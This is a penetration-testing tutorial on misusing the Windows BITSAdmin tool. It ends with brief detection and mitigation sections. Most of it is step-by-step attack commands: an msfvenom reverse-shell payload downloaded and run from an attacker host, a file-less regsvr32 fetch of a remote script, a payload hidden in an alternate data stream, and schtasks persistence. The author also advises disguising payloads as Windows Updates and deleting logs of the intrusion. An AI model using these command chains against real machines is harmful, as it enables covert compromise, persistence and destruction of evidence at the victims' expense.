In this article,
we are going to describe the utility of the BITSAdmin tool and how vital it is
in Windows Penetration Testing.
TL; DR
BITSAdmin is a
tool preinstalled on Windows OS that can be used to download malicious files.
It is one of the Living Off Land (LOL) Binaries.
Disclaimer
The main
objective of publishing the series of “Windows for Pentester” is to introduce
the circumstances and any kind of hurdles that can be faced by any Pentester
while solving CTF challenges or OSCP labs which are based on Windows Operating
System. Here we do not criticize any kind of misconfiguration that a network or
system administrator does for providing higher permissions on any
programs/binaries/files & etc.”
Table of Content
·
Introduction
o
What is BITSAdmin?
·
Configurations used in Practical
·
Working with BITSAdmin
o
Downloading using /transfer Switch
o
Downloading using /addfile Switch
o
Downloading using PowerShell
Cmdlet
o
Downloading using One-liner
·
Penetration Testing using BITSAdmin
o
Compromising using Malicious
Executable
o
Compromising using File-Less
Payload
o
Compromising with Malicious
Executable inside ADS
·
Persistence using BITSAdmin
·
Detection
o
SC Query
o
QMGR Database
o
Verbose Switch
o
Event Logs
·
Mitigation
·
Conclusion
Introduction
What is BITSAdmin?
Background
Intelligent Transfer Service Admin
is a command-line tool that creates downloads or uploads jobs and monitors
their progress. BITSAdmin was released with the Windows XP. At that time,
it used the IBackgroundCopyJob as its interface. The Upload option of the BITSAdmin
was introduced with the release of Windows Server 2003. With the release of
Windows Vista, we had some more additional features like Custom HTTP headers,
Certificate-based client authentication, IPv6 support. Subsequent year was the
release of the Windows Server 2008, it introduced the File Transfer
Notification Method (which we use it to run an executable in Practical #5).
Windows 7 introduced Branch Cache Method for the BITS Transfer. When BITS downloads
a file, the actual download is done behind the svchost.exe service. BITSAdmin
is used to download files from or upload files to HTTP web servers and SMB file
shares. It takes the cost of the transfer into account, as well as the network
usage so that the user's foreground work is not influenced. BITS has the
ability to handle network interruptions, pausing and automatically resuming
transfers, even after a reboot.
Configurations used in Practical
Attacker:
• OS: Kali Linux 2019.4
• IP: 192.168.1.13
Target:
• OS: Windows 10 (Build 18363)
• IP: 192.168.1.11
Working with BITSAdmin
As we discussed in the introduction
that BITSAdmin is used as a download client. Now we will see the BITSAdmin in
action. There are 2 switches to download a file in BITSAdmin, first one is
‘/transfer’ and ‘/addfile’. The working of both these parameters is quite
identical. But the way these switches present the progress and completion
feedback is different. BITSAdmin downloads files in the form of jobs. A job has
to be defined before moving forward. After downloading we can work on the jobs
using the various switches.
Practical #1: Downloading using /transfer Switch
The /transfer switch is a short and
quick way to download any file from the remote server to the Host Machine. To
begin the transfer, we need to define the Display Name of the transfer. It can
be anything the user wishes.
Here, we named all our transfers as
“hackingarticles”. Now after defining the name, we need to enter the location
with the name of the file from the remote server. For the Test Environment, we
have a sample image file named ignite.png at the remote server. We mention it
and we also mention the Local Location and Name of the file. After providing
all this information we hit Enter key and the transfer begins.
bitsadmin /transfer hackingarticles
http://192.168.1.13/ignite.png c:\ignite.png
We can see that we can see the State
as Transferred and we also get a confirmation “Transfer complete”. We perform a
directory Listing to check the file and we are assured that the file was indeed
transferred successfully.
Practical #2: Copying Files Locally
BITSAdmin works on the principle of
File Transfer. Hence, we can also use it as a glorified copy and paste command.
This means that BITSAdmin will also be able to transfer from one location to
another on the same machine. Let’s give it a try.
As we already know that the BITSAdmin
deals with jobs. So, we will first declare a job. We named it hackingarticles.
bitsadmin /create hackingarticles
The file that is supposed to be transferred
should be added to the job. We use the /addfile switch to complete this task. We
will be transferring the file.txt from “C:\” to “C:\Users\Victim\Desktop\”.
bitsadmin /addfile hackingarticles
c:\file.txt C:\Users\Victim\Desktop\file.txt
Now to initiate the transfer we will
be using the /resume switch. This will sound different but the /resume switch
does, in fact, initiate the transfer.
bitsadmin /resume hackingarticles
Now, when the transfer initiated. It
transfers the file in the form of a temporary file. To actually get the file
fully we will need to run the /complete switch. And as we can see that file is
successfully transferred to the Destination.
bitsadmin /complete hackingarticles
We can see that the intended file is
successfully downloaded on the Target System.
Get-ChildItem -Path
C:\Users\Victim\Desktop
Practical #3: Downloading using PowerShell Cmdlet
The practicals that we showed just now
can be performed on Windows Command Prompt (cmd.exe) as well. With the release
of the Windows Server 2016, Microsoft has released a cmdlet specifically for
the PowerShell to manage the BITS Jobs using BITSAdmin Client. It is named as
Start-BITSTransfer.
Start-BitsTransfer -Source
http://192.168.1.13/ignite.png -Destination C:\ignite.png
For the transfer using this cmdlet, we
don’t have to mention the name of the Job. We can just define the Source and
Destination as shown in the image given below.
Note: If while penetration testing, we
get an environment that is strictly PowerShell and we are not able to use the BITSAdmin
normally, we can use this method.
Practical #4: Downloading using One-liner
We can transfer our files using BITSAdmin
in one execution. This is a good example when we are in a hurry for a transfer.
Instead of declaring the job, add the file to the job, resuming the job and
complete the job in different steps we can complete all the steps required to transfer
in this one-liner. This method gets the work done in one go. This can also be
used to push in a location where we can execute a single instance of command.
bitsadmin /create hackingarticles |
bitsadmin /transfer hackingarticles http://192.168.1.13/ignite.png
c:\ignite.png | bitsadmin /resume hackingarticles | bitsadmin /complete
hackingarticles
ls
NOTE: BITSAdmin can perform many
more functions (like upload files, etc.) but we will be focusing on Penetration
Testing for now.
Penetration Testing using BITSAdmin
Practical #5: Compromising using Malicious Executable
It’s time to move on from utility to
Penetration Testing. We will be getting a meterpreter session using a payload
which will be downloaded and executed using the BITSAdmin. These practical were
tested in a lab-controlled environment where we have the same network
configuration for the entirety of the Practical. So, we created the payload
once and used it multiple times.
To begin the exploitation, we decided
to create a payload using the msfvenom tool. We use the reverse_tcp payload
with the target to be Windows System and gaining meterpreter. We defined the
Lhost for the IP Address for the Attacker Machine followed by the subsequent
Lport on which we will be receiving the session from the target machine. We
created this payload in the form of an executable and sent this payload to the
/var/www/html/ directory.
msfvenom -p
windows/meterpreter/reverse_tcp lhost=192.168.1.13 lport=1234 -f exe >
/var/www/html/payload.exe
After the payload creation, we start
the apache2 service so that the payload is available to download on the Local
Network.
service apache2 restart
After serving the payload on the web
server, we will run the listener which can capture the meterpreter session when
it will get generated.
use multi/handler
set payload
windows/meterpreter/reverse_tcp
set lhost 192.168.1.13
set lport 1234
run
We set the proper configuration of the
payload. We set the attacker machine’s IP address as the localhost address and
the port that we mentioned while creating the payload as a local port.
In our previous practices, we
downloaded a file, now we will download the payload using the same technique.
But as BITSAdmin can also execute the payload by itself we will define
parameters for it.
bitsadmin /create hackingarticles
Starting with creating a job named
“hackingarticles”, then we add the payload file in the job that we just
created.
bitsadmin /addfile hackingarticles
http://192.168.1.13/payload.exe C:\payload.exe
After adding the file, we use the
/SetNotifyCmdLine switch to execute the payload. This is done with the help of an
action that we scripted. First, it will start the cmd.exe and then, it will
complete the download and then it will execute the said command in the
background.
bitsadmin /SetNotifyCmdLine
hackingarticles cmd.exe "/c bitsadmin.exe /complete hackingarticles |
start /B C:\payload.exe"
After this, we run the /resume switch
to get the download started.
bitsadmin /resume hackingarticles
After the download completes, it
executes the payload and we have ourselves a meterpreter session.
sysinfo
Practical #6: Compromising using File-Less Payload
In the previous practical, we created
a payload file and then gained a session from it. This method creates a file
that can be detected. In other words, it was traceable. But as BITSAdmin can
execute a command directly we can exploit the target without using a file.
We will start this practice with our
attacker machine, we will be running Metasploit Framework. After opening it we
will use the web_delivery Exploit as shown in the image given below.
use exploit/multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_tcp
Here we choose the target 3 (Regsvr32)
as it will generate a small command that can be executed to get the meterpreter
session.
set target 3
We set the attacker machine’s IP
Address as localhost address and we run it. It works for a bit and gives us the
regsvr32 command that will give us access to the target machine.
set lhost 192.168.1.13
run
On the Target Machine, there is a
holdup. BITSAdmin is programmed to run the command only on completion of the
download. So, we will be needing to download something. It can be anything that
seems harmful. As BITSAdmin is designed to download the Windows Updates, we can
use its file as well. Here we will be using a harmless png image file.
bitsadmin /create hackingarticles
bitsadmin /transfer hackingarticles
http://192.168.1.13/ignite.png c:\ignite.png
After adding the file, we will move on
the /SetNotifyCmdLine. Here we will modify the command that was created using
web_delivery in such a way that regsvr32.exe creates the session from the target
machine to attacker machine.
bitsadmin /SetNotifyCmdLine
hackingarticles regsvr32.exe "/s /n /u
/i:http://192.168.1.13:8080/dE8vICrV.sct scrobj.dll"
Finally, we resume the BITSAdmin to
get this working.
bitsadmin /resume hackingarticles
As shown in the screenshot given
below, we grab a meterpreter session from the Target Machine as soon as the
command gets executed.
sessions 1
sysinfo
This was a stealthy method as there is
no file associated with the session we obtained. But this can get stealthier
using the right techniques.
Practical #7: Compromising with Malicious Executable inside
ADS
In the previous
article of this series, we
introduced Alternative Data Stream. So, without going into details about the
Alternative Data Stream, let’s compromise the target machine with a payload
concealed in the Alternative Data Steam.
We will create a malicious executable
payload using msfvenom as we did in Practical #5, as it is the same method, we
are not showing it again here.
msfvenom -p
windows/meterpreter/reverse_tcp lhost=192.168.1.13 lport=1234 -f exe >
/var/www/html/payload.exe
service apache2 restart
After creating the payload and
starting the listener, we will move to our target machine.
use multi/handler
set payload
windows/meterpreter/reverse_tcp
set lhost 192.168.1.13
set lport 1234
run
Here, we created a BITS job named
hackingarticles using the /create switch.
bitsadmin /create hackingarticles
After creating the job, we will add
the file to download using BITSAdmin’s /addfile switch.
bitsadmin /addfile hackingarticles
http://192.168.1.13/payload.exe C:\payload.exe
After adding the payload successfully,
we use the next switch /SetNotifyCmdLine to read the contents of the payload
which will be downloaded and transfer to the alternative data stream of a
file.txt.
bitsadmin /SetNotifyCmdLine
hackingarticles cmd.exe "/c type C:\paylaod.exe > C:\file.txt:payload.exe"
Keeping this configuration, we start
the download using the /resume switch.
bitsadmin /resume hackingarticles
Here, we list the C:\file.txt contents
to find that out payload.exe has successfully being transferred into the ADS of
this file.
Get-item -Path C:\file -stream *
Now to execute the file that we put in the ADS; we will be
using wmic. We will use the create switch followed by the path of the payload
as shown in the image.
wmic process call create
"c:\file.txt:payload.exe"
It says that the Execution was successful.
We went back to our Attacker Machine to see that a
meterpreter instance is generated and captured by our listener. We run sysinfo
to see the details of the Target System.
sysinfo
Practical #8: Persistence using BITSAdmin
Persistence, it means that the
exploited session will be available to you even after the target machine
restarts. Let’s see how to achieve this using BITSAdmin.
We will create a malicious executable
payload using msfvenom as we did in Practical #5, as it is the same method, we
are not showing it again here.
msfvenom -p
windows/meterpreter/reverse_tcp lhost=192.168.1.13 lport=1234 -f exe >
/var/www/html/payload.exe
service apache2 restart
After creating the payload and
starting the listener, we will move to our target machine.
use multi/handler
set payload
windows/meterpreter/reverse_tcp
set lhost 192.168.1.13
set lport 1234
run
Here, we created a BITS job named
hackingarticles using the /create switch.
bitsadmin /create hackingarticles
After creating the job, we will add
the file to download using BITSAdmin’s /addfile switch.
bitsadmin /addfile hackingarticles
http://192.168.1.13/payload.exe C:\payload.exe
After adding the payload successfully,
we use the next switch /SetNotifyCmdLine to execute the payload. This is done
with the help of an action that we scripted. First, it will start the cmd.exe
and then it will complete the download and then it will execute the said
command in the background.
bitsadmin /SetNotifyCmdLine
hackingarticles cmd.exe "/c bitsadmin.exe /complete hackingarticles |
start /B C:\payload.exe"
After this, we use another switch
/SetMinRetryDelay. It is used to set the minimum length of time, in seconds,
that BITS wait after facing a transient error before trying to transfer the
file. Here, if payload that we download gets stuck in a transient error, which
is a temporary error. BITS is designed to run continuously if an error of such
kind occurs. So, if our download is completed but due to the transient error
was not able to execute properly, this switch will make it retry after 120
seconds.
bitsadmin /SetMinRetryDelay
hackingarticles 120
That’s was simply setting up an
exploit to gain a session. Now we need to work on it to be a persistence
method. But the BITS can get into an
error state and keep the payload in a temporary state without completing the
download and in turn stopping the execution of the payload. To solve this issue,
we will use schtasks to resume our job at a specific time again and again. This
will allow the payload to persist irrespective of any kind of issue.
schtasks /create /tn hackingarticles
/tr "C:\system32\bitsadmin.exe /resume hackingarticles" /sc minute
/mp 60
The /resume switch in the schtasks
will restart the BITS job when if, it enters an error state. Using a schedule
modifier task (/mo) to make the task gets reactivated every (60, in this case)
minute. The BITSAdmin redownloads the payload in case of an error and schtasks
take care of the execution of the payload on an event of a reboot of the machine.
schtasks /run /tn hackingarticles
We went back to our Attacker Machine to see that a
meterpreter instance is generated and captured by our listener. We run sysinfo
to see the details of the Target System. In case of failure, we will have to
restart the listener with the same configuration and we will have the session
again in no time.
sysinfo
Please, note this is a limited demo.
In the real-life scenarios, we suggest that rename the payload file to look
like a Windows Update and perform all these tasks in the ‘%Temp%’ directory for
obvious reasons. We also recommend that we modify the schtasks to delete the
task after a particular time with removing the presence by deleting the logs
related to this intrusion.
Detection
Before
the official introduction of BITSAdmin in the Windows Defender Real-time Scan, it
was quite difficult to detect BITS Transfers. Apart from scanning through logs,
there wasn’t any other method. Monitoring the logs for
the usage of the BITSAdmin
tool (especially the ‘Transfer’, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine',
'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' switches) Actually, there is a way to gain the information about the transfers. It
is through the QMGR Database.
SC Query
BITSAdmin is
deployed as a service. Hence its status can be checked with the SC Query Utility.
sc query bits
This will show
if there is an instance of any BITS Transfer Running or not.
QMGR Database
It
is an abbreviated form of the Queue Manager Database. This is a record of all
the BITS Jobs. There are 2 types of files generated in this database record. A
.dat file and a .db file. This database file can be found at this location
C:\ProgramData\Microsoft\Network\Downloader\
We
traversed to the said location using the dir command to find ourselves a qmgr.db file. We tried opening the file but
it was hex-encoded.
So, we used a Hex-Editor Online tool. Here we
scanned through the data and found that we have the IP Address of the file
being Downloaded with its path. We followed the complete path and it gives us
the temporary file that was downloaded before the /complete switch was used.
It is to be noted that the BITS Jobs will not
be shown in autoruns as there is not any way to run BITSAdmin on start-up with
Default Configurations.
Verbose Switch
If
we are lucky enough to find the BITSAdmin in the act, we can get our hands some
very useful information. We ran a BITS Job and ran the following command to
gain information about the job. bitsadmin /info
hackingarticles /verbose
Event Logs
We
have the Windows Event logs which Focuses on the default event logs, it is one
of the sources for detection of any download. It is known as the
Microsoft-Windows-BITS-Client/Operational log. These logs contain the download state,
download source, user and some file information for each BITS transfer job.
This event log is strikingly similar across Windows 7 through 10 so it is a
good endpoint collection source. There are some limitations here as these logs
don’t show the sparse data, as well as the logs, are spread over several
EventIDs. Potentially a huge amount of entries in any environment makes it impossible
to spot malicious download hiding in plain sight. This log will also not detect
the BITS persistence unless there was a network transfer to a suspicious domain
as part of the configured job.
This
Log can be monitored on the Event Viewer at this Location:
Application
and Services Logs > Microsoft > Windows > BITS-Client
Mitigation
Our recommendation for mitigating BITSAdmin is to modify
network and/or host firewall rules, as well as other network controls, to only
allow legitimate BITS traffic. We can also reduce the default BITS job lifetime
in Group Policy or by editing the “JobInactivityTimeout” and “MaxDownloadTime” Registry values in HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS
The default maximum lifetime for a BITS job is
90 days, but that can be modified. Lastly, we can limit the access
of the BITSAdmin interface to specific users or groups.
Conclusion
This kind of attack is very much happening in real
life. There have been multiple incidents targeted to different office
environments where the malicious file was detected and deleted but was revived
again using BITSAdmin. It was a fun learning experience working with BITSAdmin.
We are going to write more articles about other LOLS that we could find. Stay
Tuned.
BITSAdmin Operations Persistence using BITS
Living Off Land binaries BITSAdmin
Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration
Tester. Can be Contacted on Twitter and LinkedIn
